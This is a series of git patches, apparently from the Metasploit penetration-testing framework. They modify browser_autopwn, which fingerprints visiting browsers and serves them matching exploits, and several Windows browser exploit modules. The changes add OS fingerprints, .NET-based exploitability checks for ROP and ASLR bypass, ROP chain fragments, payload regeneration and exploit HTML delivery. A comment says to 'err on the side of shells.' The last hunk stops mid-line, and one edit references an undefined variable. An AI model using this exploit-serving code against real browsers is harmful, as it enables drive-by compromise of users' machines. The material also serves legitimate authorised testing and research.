From bb4e37b7aa2567eeec441783f9e64332eeaa8ff3 Mon Sep 17 00:00:00 2001 From: James Lee Date: Fri, 6 Apr 2012 18:09:19 -0600 Subject: [PATCH 01/10] Add a few fingerprints. Thanks browsershots.org! --- lib/rex/exploitation/javascriptosdetect.js | 20 +++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/lib/rex/exploitation/javascriptosdetect.js b/lib/rex/exploitation/javascriptosdetect.js index c91474c64c..f20b8d1c10 100644 --- a/lib/rex/exploitation/javascriptosdetect.js +++ b/lib/rex/exploitation/javascriptosdetect.js @@ -64,9 +64,13 @@ window.os_detect.getVersion = function(){ case "344": // opera-9.0-20060616.1-static-qt.i386-en-344 case "2091": // opera-9.52-2091.gcc3-shared-qt3.i386.rpm case "2444": // opera-9.60.gcc4-shared-qt3.i386.rpm + case "4102": // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron) case "6386": // 10.61 os_name = oses_linux; break; + case "3445": // 10.61 + case "3516": // Opera 10.63 / Windows XP + case "7730": // Opera 8.54 / Windows XP case "8502": // "Opera 9 Eng Setup.exe" case "8679": // "Opera_9.10_Eng_Setup.exe" case "8771": // "Opera_9.20_Eng_Setup.exe" @@ -74,12 +78,20 @@ window.os_detect.getVersion = function(){ case "8801": // "Opera_9.22_Eng_Setup.exe" case "10108": // "Opera_952_10108_en.exe" case "10467": // "Opera_962_en_Setup.exe" - case "3445": // 10.61 + case "10476": // Opera 9.63 / Windows XP os_name = oses_windows; break; + case "2480": // Opera 9.64 / FreeBSD 7.0 + os_name = oses_freebsd; + break; case "6386": // 10.61 os_name = oses_mac_osx; break; + // A few are ambiguous, record them here + case "1250": + // Opera 11.61 / Windows XP + // Opera 11.61 / Debian 4.0 (Etch) + break; //default: // document.write(opera.buildNumber('inconspicuous')); // break; @@ -644,6 +656,12 @@ window.os_detect.getVersion = function(){ os_flavor = "XP"; os_sp = "SP3"; break; + case "5722589": + // browsershots.org, MSIE 7.0 / Windows XP + ua_version = "7.0"; + os_flavor = "XP"; + // don't know what the service pack is =( + break; case "576000": // IE 7.0.6000.16386, Vista Ultimate SP0 English ua_version = "7.0"; From bac6bcd6f12df5ab46a387efeb6cde631b69ddfd Mon Sep 17 00:00:00 2001 From: James Lee Date: Fri, 6 Apr 2012 18:41:14 -0600 Subject: [PATCH 02/10] More fingerprints from browsershots --- lib/rex/exploitation/javascriptosdetect.js | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/rex/exploitation/javascriptosdetect.js b/lib/rex/exploitation/javascriptosdetect.js index f20b8d1c10..f50e68eef8 100644 --- a/lib/rex/exploitation/javascriptosdetect.js +++ b/lib/rex/exploitation/javascriptosdetect.js @@ -68,6 +68,8 @@ window.os_detect.getVersion = function(){ case "6386": // 10.61 os_name = oses_linux; break; + case "1074": // Opera 11.50 / Windows XP + case "1100": // Opera 11.52 / Windows XP case "3445": // 10.61 case "3516": // Opera 10.63 / Windows XP case "7730": // Opera 8.54 / Windows XP From 9ae9509cfe5f459dcc71c4ffb52eef51aa79d8ef Mon Sep 17 00:00:00 2001 From: James Lee Date: Sun, 8 Apr 2012 11:12:32 -0600 Subject: [PATCH 03/10] More fingerprints from browsershots --- lib/rex/exploitation/javascriptosdetect.js | 31 +++++++++++++++++++--- 1 file changed, 27 insertions(+), 4 deletions(-) diff --git a/lib/rex/exploitation/javascriptosdetect.js b/lib/rex/exploitation/javascriptosdetect.js index f50e68eef8..181d7138d1 100644 --- a/lib/rex/exploitation/javascriptosdetect.js +++ b/lib/rex/exploitation/javascriptosdetect.js @@ -62,8 +62,10 @@ window.os_detect.getVersion = function(){ // though I have not verfied this claim. switch (opera.buildNumber('inconspicuous')) { case "344": // opera-9.0-20060616.1-static-qt.i386-en-344 + case "1347": // Opera 9.80 / Ubuntu 10.10 (Karmic Koala) case "2091": // opera-9.52-2091.gcc3-shared-qt3.i386.rpm case "2444": // opera-9.60.gcc4-shared-qt3.i386.rpm + case "2474": // Opera 9.63 / Debian Testing (Lenny) case "4102": // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron) case "6386": // 10.61 os_name = oses_linux; @@ -91,6 +93,7 @@ window.os_detect.getVersion = function(){ break; // A few are ambiguous, record them here case "1250": + // Opera 9.80 / Windows XP // Opera 11.61 / Windows XP // Opera 11.61 / Debian 4.0 (Etch) break; @@ -249,11 +252,13 @@ window.os_detect.getVersion = function(){ } break; case "2008102918": ua_version = "2.0.0.18"; os_name = oses_windows; break; case "2008102920": ua_version = "3.0.4"; break; + case "2008112309": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.0.4 / Debian Testing (Lenny) case "2008111317": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008111318": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2008120119": ua_version = "2.0.0.19"; os_name = oses_windows; break; case "2008120121": ua_version = "3.0.5"; os_name = oses_linux; break; case "2008120122": ua_version = "3.0.5"; os_name = oses_windows; break; + case "2008121623": ua_version = "2.0.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 2.0.0.19 / Ubuntu 8.04 LTS (Hardy Heron) case "2008121709": ua_version = "2.0.0.20"; os_name = oses_windows; break; case "2009011912": ua_version = "3.0.6"; os_name = oses_linux; break; case "2009011913": ua_version = "3.0.6"; os_name = oses_windows; break; @@ -393,20 +398,20 @@ window.os_detect.getVersion = function(){ case "20091216142458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20091216142519": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "2009121708": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break; - case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux - case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break; case "20091221151141": ua_version = "3.5.7"; os_name = oses_mac_osx; break; case "20091221152502": ua_version = "3.5.7"; os_name = oses_linux; break; + case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux case "20091221164558": ua_version = "3.5.7"; os_name = oses_windows; break; + case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break; case "2009122200": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20091223231431": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "PCLunixOS"; arch = arch_x86; break; case "20100105194006": ua_version = "3.6.0.rc1"; os_name = oses_mac_osx; break; case "20100105194116": ua_version = "3.6.0.rc1"; os_name = oses_linux; break; case "20100105212446": ua_version = "3.6.0.rc1"; os_name = oses_windows; break; case "2010010604": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; break; - case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100106054534": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86 case "20100106054634": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 + case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100106211825": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100106212742": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100106215614": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; @@ -465,8 +470,8 @@ window.os_detect.getVersion = function(){ case "2010040116": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040118": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040119": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; - case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100401213457": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; + case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010040123": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010040200": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100402010516": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break; @@ -547,6 +552,24 @@ window.os_detect.getVersion = function(){ case "20100716093011": ua_version = "3.6.7.b2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20101203075014": ua_version = "3.6.13"; os_name = oses_windows; break; case "20101206122825": ua_version = "3.6.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break; + case "20110318052756": ua_version = "4.0"; os_name = oses_windows; break; // browsershots: Firefox 4.0 / Windows XP + case "20110420144310": ua_version = "3.5.19"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.5.19 / Debian 4.0 (Etch) + case "20110615151330": ua_version = "5.0"; os_name = oses_windows; break; // browsershots: Firefox 5.0 / Windows XP + case "20110811165603": ua_version = "6.0"; os_name = oses_windows; break; // browsershots: Firefox 6.0 / Windows XP + case "20110830092941": ua_version = "6.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 6.0.1 / Debian 4.0 (Etch) + case "20110922153450": ua_version = "7.0"; os_name = oses_windows; break; // browsershots: Firefox 7.0 / Windows XP + case "20110928134238": ua_version = "7.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 7.0.1 / Debian 4.0 (Etch) + case "20111104165243": ua_version = "8.0"; os_name = oses_windows; break; // browsershots: Firefox 8.0 / Windows XP + case "20111115183813": ua_version = "8.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 8.0 / Ubuntu 9.10 (Karmic Koala) + case "20111216140209": ua_version = "9.0"; os_name = oses_windows; break; // browsershots: Firefox 9.0 / Windows XP + case "20120129021758": ua_version = "10.0"; os_name = oses_windows; break; // browsershots: Firefox 10.0 / Windows 2000 + case "20120201083324": ua_version = "3.5.16"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.5.16 / Debian 4.0 (Etch) + case "20120216013254": ua_version = "3.6.27"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.6.27 / Debian 4.0 (Etch) + case "20120216100510": ua_version = "10.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 10.0.2 / Ubuntu 9.10 (Karmic Koala) + case "20120310010316": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 11.0 / Ubuntu 9.10 (Karmic Koala) + case "20120310194926": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; + case "20120312181643": ua_version = "11.0"; os_name = oses_windows; break; // browsershots: Firefox 11.0 / Windows XP + case "20120314195616": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 12.0 / Debian 4.0 (Etch) default: version = this.searchVersion("Firefox", navigator.userAgent); // Verify whether the ua string is lying by checking if it contains From f520af036f27d4c8b21626737543af41178819bd Mon Sep 17 00:00:00 2001 From: James Lee Date: Sun, 8 Apr 2012 17:06:23 -0600 Subject: [PATCH 04/10] Move next_exploit() onto window object so it's accessible everywhere I swear I committed this before, not sure what happened. --- modules/auxiliary/server/browser_autopwn.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index b8a241323e..e2ff9ebb9f 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -706,7 +706,7 @@ class Metasploit3 < Msf::Auxiliary # Generic stuff that is needed regardless of what browser was detected. js << <<-ENDJS var written_iframes = new Array(); - function write_iframe(myframe) { + window.write_iframe = function (myframe) { var iframe_idx; var mybody; for (iframe_idx in written_iframes) { if (written_iframes[iframe_idx] == myframe) { @@ -718,7 +718,7 @@ class Metasploit3 < Msf::Auxiliary str += ''; document.body.innerHTML += (str); } - function next_exploit(exploit_idx) { + window.next_exploit = function (exploit_idx) { #{js_debug("'next_exploit(' + exploit_idx +')'")} if (!global_exploit_list[exploit_idx]) { #{js_debug("'End'")} @@ -745,15 +745,15 @@ class Metasploit3 < Msf::Auxiliary if (eval(test)) { #{js_debug("'test says it is vuln, writing iframe for ' + global_exploit_list[exploit_idx].resource + '
'")} - write_iframe(global_exploit_list[exploit_idx].resource); - setTimeout("next_exploit(" + (exploit_idx+1).toString() + ")", 1000); + window.write_iframe(global_exploit_list[exploit_idx].resource); + setTimeout("window.next_exploit(" + (exploit_idx+1).toString() + ")", 1000); } else { #{js_debug("'this client does not appear to be vulnerable to ' + global_exploit_list[exploit_idx].resource + '
'")} - next_exploit(exploit_idx+1); + window.next_exploit(exploit_idx+1); } } catch(e) { #{js_debug("'test threw an exception: ' + e.message + '
'")} - next_exploit(exploit_idx+1); + window.next_exploit(exploit_idx+1); }; } ENDJS @@ -832,8 +832,8 @@ class Metasploit3 < Msf::Auxiliary js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n| js << %Q|document.body.appendChild(noscript_div);\n| - js << "#{js_debug("'starting exploits
'")}\n" - js << "next_exploit(0);\n" + js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)
'")}\n" + js << "window.next_exploit(0);\n" js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate From da1cb2b81d932c804f05955ce245300416f9ffff Mon Sep 17 00:00:00 2001 From: James Lee Date: Sun, 8 Apr 2012 22:07:09 -0600 Subject: [PATCH 05/10] ActiveX controls require IE --- modules/exploits/windows/browser/wmi_admintools.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index c918f36dc1..47bfbd6917 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote autopwn_info({ :os_name => OperatingSystems::WINDOWS, + :ua_name => HttpClients::IE, :rank => NormalRanking, :vuln_test => nil, }) From 409ba3139be41f6d4b3fd3ff9312b5baf559a0c2 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 9 Apr 2012 00:50:04 -0600 Subject: [PATCH 06/10] Add bap checks for blackice exploit --- .../exploits/windows/browser/blackice_downloadimagefileurl.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index 605b1296eb..4604118c40 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -21,9 +21,11 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, + :ua_name => HttpClients::IE, :javascript => true, :rank => NormalRanking, - :vuln_test => nil, + :classid => "{79956462-F148-497F-B247-DF35A095F80B}", + :vuln_test => "DownloadImageFileURL", }) def initialize(info = {}) From a6b106e8674b854581539d5bd28a3a4560ee11fa Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 9 Apr 2012 01:05:37 -0600 Subject: [PATCH 07/10] Remove autopwn support for enjoysapgui_comp_download No automatic targeting, the payload doesn't execute immediately, and requires the browser be running as Admin. Bascially just not a great candidate for being run automatically. --- .../exploits/windows/browser/enjoysapgui_comp_download.rb | 8 -------- 1 file changed, 8 deletions(-) diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb index ab223a4203..50daa25ce3 100644 --- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb +++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb @@ -17,14 +17,6 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE - include Msf::Exploit::Remote::BrowserAutopwn - autopwn_info({ - :os_name => OperatingSystems::WINDOWS, - :javascript => true, - :rank => NormalRanking, - :vuln_test => nil, - }) - def initialize(info = {}) super(update_info(info, 'Name' => 'EnjoySAP SAP GUI ActiveX Control Arbitrary File Download', From 3ca440089e9addc13f22b0cfe24b14433e8e672e Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 9 Apr 2012 01:23:44 -0600 Subject: [PATCH 08/10] Add checks for .NET requisites Also standardizes print_status format to look nicer with lots of cilents --- .../windows/browser/ms11_003_ie_css_import.rb | 35 +++++++++++-------- .../browser/ms11_050_mshtml_cobjectelement.rb | 13 ++++--- 2 files changed, 29 insertions(+), 19 deletions(-) diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index 8d1e5de1e4..8d7c91af6a 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -22,7 +22,9 @@ class Metasploit3 < Msf::Exploit::Remote :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, - :vuln_test => nil, # no way to test without just trying it + # Not strictly a vuln check, but an exploitability check since a + # specific version of .NET is required to make the ROP work. + :vuln_test => "if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)) { is_vuln = true }else{ is_vuln = false }", }) def initialize(info = {}) @@ -152,27 +154,30 @@ class Metasploit3 < Msf::Exploit::Remote agent = request.headers['User-Agent'] #print_status("Checking user agent: #{agent}") - if agent !~ /\.NET CLR 2\.0\.50727/ - print_error("#{cli.peerhost}:#{cli.peerport} Target machine does not have the .NET CLR 2.0.50727") - return nil - end - if agent =~ /MSIE 6\.0/ mytarget = targets[3] elsif agent =~ /MSIE 7\.0/ - mytarget = targets[2] + mytarget = ua_has_clr(cli,agent) ? targets[2] : nil elsif agent =~ /MSIE 8\.0/ - mytarget = targets[1] + mytarget = ua_has_clr(cli,agent) ? targets[1] : nil else - print_error("#{cli.peerhost}:#{cli.peerport} Unknown User-Agent #{agent}") + print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}") end mytarget end + def ua_has_clr(cli, agent) + if agent =~ /\.NET CLR 2\.0\.50727/ + return true + end + print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Target machine does not have the .NET CLR 2.0.50727") + false + end + def on_request_uri(cli, request) - print_status("#{cli.peerhost}:#{cli.peerport} Received request for %s" % request.uri.inspect) + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Received request for %s" % request.uri.inspect) mytarget = target if target.name == 'Automatic' @@ -183,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - #print_status("#{cli.peerhost}:#{cli.peerport} Automatically selected target: #{mytarget.name}") + #print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Automatically selected target: #{mytarget.name}") buf_addr = mytarget.ret css_name = [buf_addr].pack('V') * (16 / 4) @@ -193,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote uni_placeholder = Rex::Text.to_unicode(placeholder) if request.uri == get_resource() or request.uri =~ /\/$/ - print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} redirect") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending redirect") redir = get_resource() redir << '/' if redir[-1,1] != '/' @@ -205,7 +210,7 @@ class Metasploit3 < Msf::Exploit::Remote # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) - print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} HTML") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML") # Generate the ROP payload rvas = rvas_mscorie_v2() @@ -309,7 +314,7 @@ EOS send_response(cli, html, { 'Content-Type' => 'text/html' }) elsif request.uri =~ /\.dll$/ - print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} .NET DLL") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending .NET DLL") # Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually # use it's contents ... @@ -340,7 +345,7 @@ EOS css = "\xff\xfe" + Rex::Text.to_unicode(css) css.gsub!(uni_placeholder, css_name) - print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} CSS") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending CSS") send_response(cli, css, { 'Content-Type' => 'text/css' }) diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb index c445e2cc83..5e24660346 100644 --- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb +++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb @@ -22,7 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, - :vuln_test => nil, + # If it's IE 8, then we need .net to bypass ASLR + :vuln_test => %Q| + if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) { + if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false } + } + |, }) def initialize(info={}) @@ -153,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote mytarget = auto_target(cli, request) if mytarget.nil? agent = request.headers['User-Agent'] - print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") + print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}") send_not_found(cli) return end @@ -175,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote DATA - print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Triggering vulnerability (target: #{mytarget.name})...") send_response(cli, data, { 'Content-Type' => 'text/html' }) return end @@ -297,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote HTML - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} (#{mytarget.name})...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit (#{mytarget.name})...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end From b38933328fbf4cfeb61543ff2e275d446ecfd211 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 9 Apr 2012 01:53:57 -0600 Subject: [PATCH 09/10] Send exploits that are not assocated with any browser to all of them --- modules/auxiliary/server/browser_autopwn.rb | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index e2ff9ebb9f..3b105c31d1 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -766,7 +766,12 @@ class Metasploit3 < Msf::Auxiliary @js_tests.each { |browser, sploits| next unless client_matches_browser(client_info, browser) - if (client_info.nil? || [nil, browser].include?(client_info[:ua_name])) + # Send all the generics regardless of what the client is. If the + # client is nil, then we don't know what it really is, so just err + # on the side of shells and send everything. Otherwise, send only + # if the client is using the browser associated with this set of + # exploits. + if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name])) sploits.each do |s| if s[:vuln_test].nil? or s[:vuln_test].empty? test = "is_vuln = true" @@ -783,7 +788,10 @@ class Metasploit3 < Msf::Auxiliary # victim. Note that host_info comes from javascript OS # detection, NOT the database. if host_info[:os_name] != "undefined" - next unless s[:os_name].include?(host_info[:os_name]) + unless s[:os_name].include?(host_info[:os_name]) + vprint_status("Rejecting #{s[:name]} for non-matching OS") + next + end end end js << "global_exploit_list[global_exploit_list.length] = {\n" @@ -881,6 +889,7 @@ class Metasploit3 < Msf::Auxiliary def client_matches_browser(client_info, browser) if client_info and browser and client_info[:ua_name] if browser != "generic" and client_info[:ua_name] != browser + vprint_status("Rejecting exploits for #{browser}") return false end end From 037fbf655e342efc60cdc0fa8dba0b32826c095f Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 9 Apr 2012 01:57:50 -0600 Subject: [PATCH 10/10] Standardize the print format for modules used by browser autopwn --- .../windows/browser/adobe_flash_mp4_cprt.rb | 14 +++++++------- .../browser/apple_quicktime_marshaled_punk.rb | 4 ++-- .../windows/browser/apple_quicktime_rtsp.rb | 6 +++--- .../windows/browser/apple_quicktime_smil_debug.rb | 5 ++--- .../browser/blackice_downloadimagefileurl.rb | 8 ++++---- .../exploits/windows/browser/ie_createobject.rb | 5 +++-- .../windows/browser/mozilla_interleaved_write.rb | 2 +- .../exploits/windows/browser/mozilla_mchannel.rb | 4 ++-- .../windows/browser/mozilla_nstreerange.rb | 8 ++++---- .../windows/browser/ms03_020_ie_objecttype.rb | 4 ++-- .../windows/browser/ms10_018_ie_behaviors.rb | 5 ++--- .../windows/browser/ms11_003_ie_css_import.rb | 1 - .../exploits/windows/browser/winzip_fileview.rb | 2 +- modules/exploits/windows/browser/wmi_admintools.rb | 9 ++++----- 14 files changed, 37 insertions(+), 40 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 1c5da9a200..ea468e44cf 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt - print_status("#{cli.peerhost}:#{cli.peerport} - Using msvcrt ROP") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Using msvcrt ROP") exec_size = code.length rop = [ @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote ].pack("V*") when :jre - print_status("#{cli.peerhost}:#{cli.peerport} - Using JRE ROP") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Using JRE ROP") exec_size = 0xffffffff - code.length + 1 rop = [ @@ -243,23 +243,23 @@ class Metasploit3 < Msf::Exploit::Remote # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? - print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}") + print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Browser not supported: #{agent}") send_not_found(cli) return end - print_status("#{cli.peerhost}:#{cli.peerport} - Client requesting: #{request.uri}") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Client requesting: #{request.uri}") # The SWF requests our MP4 trigger if request.uri =~ /\.mp4$/ - print_status("#{cli.peerhost}:#{cli.peerport} - Sending MP4...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending MP4...") mp4 = create_mp4(my_target) send_response(cli, mp4, {'Content-Type'=>'video/mp4'}) return end if request.uri =~ /\.swf$/ - print_status("#{cli.peerhost}:#{cli.peerport} - Sending Exploit SWF...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending Exploit SWF") send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' }) return end @@ -323,7 +323,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer"> html = html.gsub(/^\t\t/, '') - print_status("#{cli.peerhost}:#{cli.peerport} - Sending html") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb index 670cb27f6d..1a9a7af966 100644 --- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb +++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb @@ -20,9 +20,9 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, + :ua_name => HttpClients::IE, :javascript => true, :rank => NormalRanking, # reliable memory corruption - :vuln_test => nil, }) def initialize(info = {}) @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote return if ((p = regenerate_payload(client)) == nil) - print_status("Sending #{self.name} exploit HTML to #{client.peerhost}:#{client.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...") shellcode = Rex::Text.to_unescape(p.encoded) diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb index 8e2a49a22d..67a5f922c3 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb @@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, + # No particular browser. Works on at least IE6 and Firefox 1.5.0.3 :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => nil, @@ -94,11 +95,10 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [target.ret].pack('V') + [0xe8, 